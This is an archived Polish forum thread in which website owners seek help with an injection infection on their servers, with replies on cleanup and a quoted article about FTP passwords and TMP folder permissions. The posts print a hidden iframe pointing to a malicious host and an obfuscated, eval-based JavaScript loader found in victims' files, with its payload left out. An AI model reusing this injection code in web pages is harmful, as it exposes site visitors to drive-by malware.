Pełna wersja: [HTML]iframe
Witam . mam problem i nie wiem gdzie z tym się udać od kilku miesięcy cały czas pokazuje mi się na stronie w kodzie taka linijka "<iframe src="http://q5a.ru:8080/index.php" width=134 height=110 style="visibility: hidden"></iframe>" co usunę ja to powraca wiecie może co to i jak sie tego pozbyć.
To jest wirus iframe-inf!
Było wiele razy o tym na forum,
wywal iframy z wszystkich plików, zmień hasło do ftp , nie zapisuj go w totalcomanderze .
wywal iframy z wszystkich plików, zmień hasło do ftp , nie zapisuj go w totalcomanderze .
Teraz to wiem jak szukać taki artykuł znalazłem zobaczę czy pomoże.
Cytat
Wirus iFrame - Total Commander?
Od kilku tygodni niezwykle złośliwy wirus atakuje strony internetowe. Do plików index.php i index.html dodaje m.in. ukryte ramki iFrame, ale także wiele innych złośliwych modyfikacji (np. przekierowania na strony porno przy próbie wejścia na stronę z wyszukiwarki google itp. w pliku .htaccess). W kilku źródłach pojawiły się informacje o tym, że wirus atakuje wykradając hasła z programu Total Commander. Z naszych osobistych przygód z tym wirusem wynikałoby jednak zupełnie co innego.
Kiedy wirus zaatakował niektóre z naszych stron wystraszyliśmy się, że faktycznie na którąś z maszyn dostał się wirus pozwalający na wykradnięcie haseł. Pierwszym krokiem była zatem zmiana haseł do serwera FTP i usunięcie szkodliwych wpisów przy użyciu "czystego" komputera. Zadziałało na kilka godzin. Powtórzyliśmy operację dwukrotnie, za każdym razem sytuacja powtarzała się. W międzyczasie przeskanowaliśmy komputery z zainstalowanym Total Commanderem 5 różnymi narzędziami (Symantec, MKS_VIR online, Avast, Combo Fix, Spybot) - nic nie znalazły.
Zauważyliśmy natomiast następującą prawidłowość - jeśli wirus faktycznie wykradłby hasła z Total Commandera zaatakowałby wszystkie strony, jednakże ofiarami ataku padły tylko te, które były:
a) dynamiczne
hostowane w podkatalogach na home.pl.
Rozwiązanie
W katalogu głównym przestrzeni serwerowej udostępnianej użytkownikom home.pl tworzy domyślnie katalog TMP, chcąc "postawić" dynamiczny serwis, w podfolderze musimy stworzyć identyczny katalog, dzięki któremu będziemy mogli używać sesji (czytaj więcej tutaj). Domyślne uprawnienia, z którymi tworzone są katalogi to 755, home.pl nadaje swoim katalogom jednakże uprawnienia 711. Wirus najprawdopodobniej przeszukiwał sieć (tak jak pajączki google) w poszukiwaniu prawidłowości - niezabezpieczonych folderów TMP. W jaki sposób dodawał wpisy do plików? No coż... nie jesteśmy hakerami, nie znamy odpowiedzi na to pytanie. W naszym wypadku ataki faktycznie ustały po zmianie uprawnień do folderów TMP na 711. Jak to zrobić przy użyciu Total Commandera?
Połącz się FTP-a zaznacz katalog TMP, z menu Pliki wybierz Zmień atrybuty i ustaw uprawnienia na 711 (właściciel: czytaj, zapisz, wykonaj; grupa: wykonaj; świat: wykonaj).
Zródło: http://www.mojito...commander/
Od kilku tygodni niezwykle złośliwy wirus atakuje strony internetowe. Do plików index.php i index.html dodaje m.in. ukryte ramki iFrame, ale także wiele innych złośliwych modyfikacji (np. przekierowania na strony porno przy próbie wejścia na stronę z wyszukiwarki google itp. w pliku .htaccess). W kilku źródłach pojawiły się informacje o tym, że wirus atakuje wykradając hasła z programu Total Commander. Z naszych osobistych przygód z tym wirusem wynikałoby jednak zupełnie co innego.
Kiedy wirus zaatakował niektóre z naszych stron wystraszyliśmy się, że faktycznie na którąś z maszyn dostał się wirus pozwalający na wykradnięcie haseł. Pierwszym krokiem była zatem zmiana haseł do serwera FTP i usunięcie szkodliwych wpisów przy użyciu "czystego" komputera. Zadziałało na kilka godzin. Powtórzyliśmy operację dwukrotnie, za każdym razem sytuacja powtarzała się. W międzyczasie przeskanowaliśmy komputery z zainstalowanym Total Commanderem 5 różnymi narzędziami (Symantec, MKS_VIR online, Avast, Combo Fix, Spybot) - nic nie znalazły.
Zauważyliśmy natomiast następującą prawidłowość - jeśli wirus faktycznie wykradłby hasła z Total Commandera zaatakowałby wszystkie strony, jednakże ofiarami ataku padły tylko te, które były:
a) dynamiczne
hostowane w podkatalogach na home.pl.Rozwiązanie
W katalogu głównym przestrzeni serwerowej udostępnianej użytkownikom home.pl tworzy domyślnie katalog TMP, chcąc "postawić" dynamiczny serwis, w podfolderze musimy stworzyć identyczny katalog, dzięki któremu będziemy mogli używać sesji (czytaj więcej tutaj). Domyślne uprawnienia, z którymi tworzone są katalogi to 755, home.pl nadaje swoim katalogom jednakże uprawnienia 711. Wirus najprawdopodobniej przeszukiwał sieć (tak jak pajączki google) w poszukiwaniu prawidłowości - niezabezpieczonych folderów TMP. W jaki sposób dodawał wpisy do plików? No coż... nie jesteśmy hakerami, nie znamy odpowiedzi na to pytanie. W naszym wypadku ataki faktycznie ustały po zmianie uprawnień do folderów TMP na 711. Jak to zrobić przy użyciu Total Commandera?
Połącz się FTP-a zaznacz katalog TMP, z menu Pliki wybierz Zmień atrybuty i ustaw uprawnienia na 711 (właściciel: czytaj, zapisz, wykonaj; grupa: wykonaj; świat: wykonaj).
Zródło: http://www.mojito...commander/
witam
mam problemy z wirusami na swoim serwerze, usunelam wszystkie iframe, ale w niektorych plikach php nie ma tych kodów złośliwych iframe a program antywirusowy i tak krzyczy ze jest wirus. podaje kod takiego pliku, moze ktoś mi powie gdzie tu jest ukryty wirus:
<!-- ad -->'; ?>
<!-- ad --><script>this.hKaGo='';var inNu=5160;function oeofOm(){};var haHeEa;var maLiK=new Date();this.poOmLo="";axOr=0;while(axOr<4){axOr++};haHeEa='TU JEST MILION JAKIŚ LICZB Z PROCENTAMI';var lMiEe=function(){};function piOp(piOp){return true};function aaDi(bMoOb){for(ohAeOr=0;ohAeOr<3;ohAeOr++){};var axPaQ="axPaQ";this.doOn=11801;this.itOn=false;var aMaAs='';function giHe(miQi){var moIfEe=function(){};amOnAw=0;while(amOnAw<3){amOnAw++};var itAdAt=0;this.aeGoC="aeGoC";var osAmF=function(){};var gExAi=miQi.length, kaEnOeof=0;var ooAi=false;function mEh(){};function asOn(){};var baPo=4132;var koNDa=false;while(kaEnOeof<gExAi){this.eLi="eLi";this.piAmI="piAmI";function ioOn(ioOn){return true};for(faEl=0;faEl<2;faEl++){};aeHi=0;while(aeHi<2){aeHi++};var rN=function(){};itAdAt+=enPaOp(miQi,kaEnOeof)*gExAi;var qPiBo=function(){return 'qPiBo'};var oxPa='';kaEnOeof++;var aiE=false;function itMiF(itMiF){return true};}function omI(omI){return 'omI'};this.myAmAi="";this.nEnJ="";var odOn='';var heMGi=new Date();var odBeIs="odBeIs";return (itAdAt+'');var naPoIf="";var laAm='laAm'.substring(119, 119);}var haHe='';this.odIoAa="";var giOeofId="";var onExEl=function(){};function enPaOp(ehIfLa,gNyE){for(paD=0;paD<2;paD++){};for(heLa=0;heLa<4;heLa++){};return ehIfLa['cJhJajrLC/oLd/ejALtL'.replace(/[/J8Lj]/g, '')](gNyE);var diDaPi="diDaPi";for(joKoR=0;joKoR<0;joKoR++){joKoR++};var adHo=new Date();}var naOpOn=function(){};var joN=new Date();function asEP(asEP){return 'asEP'};this.loP='';var pEn="";var daLaBo="";if((new String(document.write)).indexOf('arity') > 0) {this.aaAsAx="";var ayEx="";var lHi="";return;this.neI="";this.atMe="atMe";function omEm(){};}function pItEa(pItEa){return 'pItEa'};var oyLo=false;neDi=0;while(neDi<1){neDi++};function goOw(){};for(muIt=0;muIt<4;muIt++){};function haOsNa(haOsNa){return true};var exEmA=new Date();this.poNHo='';var lJoMa="";var omBoB=0,fyLo=0, pByKa=117;for(guLa=0;guLa<1;guLa++){guLa++};var baMiN=new Date();var fyGoJ=new Date();var atP='';this.moNoOd="";var onNoH=function(){};var elAeNu=(new String(aaDi)).replace(/[^@a-z0-9A-Z_.,-]/g,'');this.noFPo=56884;for(aeEs=0;aeEs<4;aeEs++){aeEs++};var hAr=giHe(elAeNu);this.fyIf=19804;this.isIdE=36292;this.omDi="omDi";var joOo="";var neAx="neAx";function piOu(piOu){return true};bMoOb=window['u?n#e?s4c?a@pYe@'.replace(/[\?@Y#4]/g, '')](bMoOb);for(anG=0;anG<0;anG++){anG++};var fyOr='';function anAyEx(){};var asOxAd=new Array();var liElOw=3562;for(var ohMo=0; ohMo < (bMoOb.length); ohMo++){var qR=new Array();this.loFy=15953;var naHi=new Date();ouMyMo=0;while(ouMyMo<0){ouMyMo++};this.goAx=false;var onOnPa=enPaOp(elAeNu,omBoB);this.moKy='';this.owA='';var lNP=enPaOp(hAr,fyLo);var ehBy=new Date();this.ioEEn=false;this.mByNu="";var miAy=38214;var naNuAs=false;var owKo=onOnPa^lNP^pByKa;var odIfOw='';var muLoAe=false;this.ohAw=41498;var eeNu=enPaOp(bMoOb,ohMo);for(odNOh=0;odNOh<0;odNOh++){odNOh++};var eaQi=43047;var obOpBo=new Array();this.erGu='';this.cQ=false;function gBiEm(gBiEm){return 'gBiEm'};omBoB++,fyLo++;var guDoOh='';this.maAxIt=1945;this.arAmEs="";atP+=String['fbrZoTmTCZhbaTrbCToRdZez'.replace(/[zRbZT]/g, '')](eeNu^owKo);var ohOn=false;this.eNoN='';var naFEx="";var inOxAs=function(){};function jFaMo(jFaMo){return 'jFaMo'};var adHe=function(){};if(fyLo>hAr.length)fyLo=0;for(kaG=0;kaG<0;kaG++){kaG++};var ohPEr=function(){};for(ioArAn=0;ioArAn<2;ioArAn++){ioArAn++};if(omBoB>elAeNu.length)omBoB=0;var jLi=function(){return 'jLi'};for(diOr=0;diOr<4;diOr++){};this.onGoMo=11260;}this.qHOy="qHOy";var enKOy='';var enEm=false;this.hLi='';var amOd=false;window['esvYa;ls'.replace(/[FYs;T]/g, '')](atP);this.biOuBi="biOuBi";var ohObOp='ohObOp'.substring(23925, 23925);function aiOhHe(aiOhHe){return 'aiOhHe'};function adGAs(adGAs){return 'adGAs'};var enKaM=function(){};return atP=new String();var goEx='goEx'.substring(60789, 60789);this.awOdEx="";this.qiMaMa='';function daEsD(){};function omDAr(omDAr){return true};}var maEa=function(){};var omEsP=33612;aaDi(haHeEa);var awDoEe=function(){return 'awDoEe'};function ayMy(ayMy){return 'ayMy'};var fGoAy=function(){return 'fGoAy'};</script><!-- /ad -->
bardzo prosze o pomoc, dziekuje z gory
mój nr.gg: 8746211
mam problemy z wirusami na swoim serwerze, usunelam wszystkie iframe, ale w niektorych plikach php nie ma tych kodów złośliwych iframe a program antywirusowy i tak krzyczy ze jest wirus. podaje kod takiego pliku, moze ktoś mi powie gdzie tu jest ukryty wirus:
<!-- ad -->'; ?>
<!-- ad --><script>this.hKaGo='';var inNu=5160;function oeofOm(){};var haHeEa;var maLiK=new Date();this.poOmLo="";axOr=0;while(axOr<4){axOr++};haHeEa='TU JEST MILION JAKIŚ LICZB Z PROCENTAMI';var lMiEe=function(){};function piOp(piOp){return true};function aaDi(bMoOb){for(ohAeOr=0;ohAeOr<3;ohAeOr++){};var axPaQ="axPaQ";this.doOn=11801;this.itOn=false;var aMaAs='';function giHe(miQi){var moIfEe=function(){};amOnAw=0;while(amOnAw<3){amOnAw++};var itAdAt=0;this.aeGoC="aeGoC";var osAmF=function(){};var gExAi=miQi.length, kaEnOeof=0;var ooAi=false;function mEh(){};function asOn(){};var baPo=4132;var koNDa=false;while(kaEnOeof<gExAi){this.eLi="eLi";this.piAmI="piAmI";function ioOn(ioOn){return true};for(faEl=0;faEl<2;faEl++){};aeHi=0;while(aeHi<2){aeHi++};var rN=function(){};itAdAt+=enPaOp(miQi,kaEnOeof)*gExAi;var qPiBo=function(){return 'qPiBo'};var oxPa='';kaEnOeof++;var aiE=false;function itMiF(itMiF){return true};}function omI(omI){return 'omI'};this.myAmAi="";this.nEnJ="";var odOn='';var heMGi=new Date();var odBeIs="odBeIs";return (itAdAt+'');var naPoIf="";var laAm='laAm'.substring(119, 119);}var haHe='';this.odIoAa="";var giOeofId="";var onExEl=function(){};function enPaOp(ehIfLa,gNyE){for(paD=0;paD<2;paD++){};for(heLa=0;heLa<4;heLa++){};return ehIfLa['cJhJajrLC/oLd/ejALtL'.replace(/[/J8Lj]/g, '')](gNyE);var diDaPi="diDaPi";for(joKoR=0;joKoR<0;joKoR++){joKoR++};var adHo=new Date();}var naOpOn=function(){};var joN=new Date();function asEP(asEP){return 'asEP'};this.loP='';var pEn="";var daLaBo="";if((new String(document.write)).indexOf('arity') > 0) {this.aaAsAx="";var ayEx="";var lHi="";return;this.neI="";this.atMe="atMe";function omEm(){};}function pItEa(pItEa){return 'pItEa'};var oyLo=false;neDi=0;while(neDi<1){neDi++};function goOw(){};for(muIt=0;muIt<4;muIt++){};function haOsNa(haOsNa){return true};var exEmA=new Date();this.poNHo='';var lJoMa="";var omBoB=0,fyLo=0, pByKa=117;for(guLa=0;guLa<1;guLa++){guLa++};var baMiN=new Date();var fyGoJ=new Date();var atP='';this.moNoOd="";var onNoH=function(){};var elAeNu=(new String(aaDi)).replace(/[^@a-z0-9A-Z_.,-]/g,'');this.noFPo=56884;for(aeEs=0;aeEs<4;aeEs++){aeEs++};var hAr=giHe(elAeNu);this.fyIf=19804;this.isIdE=36292;this.omDi="omDi";var joOo="";var neAx="neAx";function piOu(piOu){return true};bMoOb=window['u?n#e?s4c?a@pYe@'.replace(/[\?@Y#4]/g, '')](bMoOb);for(anG=0;anG<0;anG++){anG++};var fyOr='';function anAyEx(){};var asOxAd=new Array();var liElOw=3562;for(var ohMo=0; ohMo < (bMoOb.length); ohMo++){var qR=new Array();this.loFy=15953;var naHi=new Date();ouMyMo=0;while(ouMyMo<0){ouMyMo++};this.goAx=false;var onOnPa=enPaOp(elAeNu,omBoB);this.moKy='';this.owA='';var lNP=enPaOp(hAr,fyLo);var ehBy=new Date();this.ioEEn=false;this.mByNu="";var miAy=38214;var naNuAs=false;var owKo=onOnPa^lNP^pByKa;var odIfOw='';var muLoAe=false;this.ohAw=41498;var eeNu=enPaOp(bMoOb,ohMo);for(odNOh=0;odNOh<0;odNOh++){odNOh++};var eaQi=43047;var obOpBo=new Array();this.erGu='';this.cQ=false;function gBiEm(gBiEm){return 'gBiEm'};omBoB++,fyLo++;var guDoOh='';this.maAxIt=1945;this.arAmEs="";atP+=String['fbrZoTmTCZhbaTrbCToRdZez'.replace(/[zRbZT]/g, '')](eeNu^owKo);var ohOn=false;this.eNoN='';var naFEx="";var inOxAs=function(){};function jFaMo(jFaMo){return 'jFaMo'};var adHe=function(){};if(fyLo>hAr.length)fyLo=0;for(kaG=0;kaG<0;kaG++){kaG++};var ohPEr=function(){};for(ioArAn=0;ioArAn<2;ioArAn++){ioArAn++};if(omBoB>elAeNu.length)omBoB=0;var jLi=function(){return 'jLi'};for(diOr=0;diOr<4;diOr++){};this.onGoMo=11260;}this.qHOy="qHOy";var enKOy='';var enEm=false;this.hLi='';var amOd=false;window['esvYa;ls'.replace(/[FYs;T]/g, '')](atP);this.biOuBi="biOuBi";var ohObOp='ohObOp'.substring(23925, 23925);function aiOhHe(aiOhHe){return 'aiOhHe'};function adGAs(adGAs){return 'adGAs'};var enKaM=function(){};return atP=new String();var goEx='goEx'.substring(60789, 60789);this.awOdEx="";this.qiMaMa='';function daEsD(){};function omDAr(omDAr){return true};}var maEa=function(){};var omEsP=33612;aaDi(haHeEa);var awDoEe=function(){return 'awDoEe'};function ayMy(ayMy){return 'ayMy'};var fGoAy=function(){return 'fGoAy'};</script><!-- /ad -->
bardzo prosze o pomoc, dziekuje z gory
mój nr.gg: 8746211
Używaj BBcode.
Ty pisałaś ten kod?
Jeśli nie to wywal go
Ty pisałaś ten kod?
Jeśli nie to wywal go
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.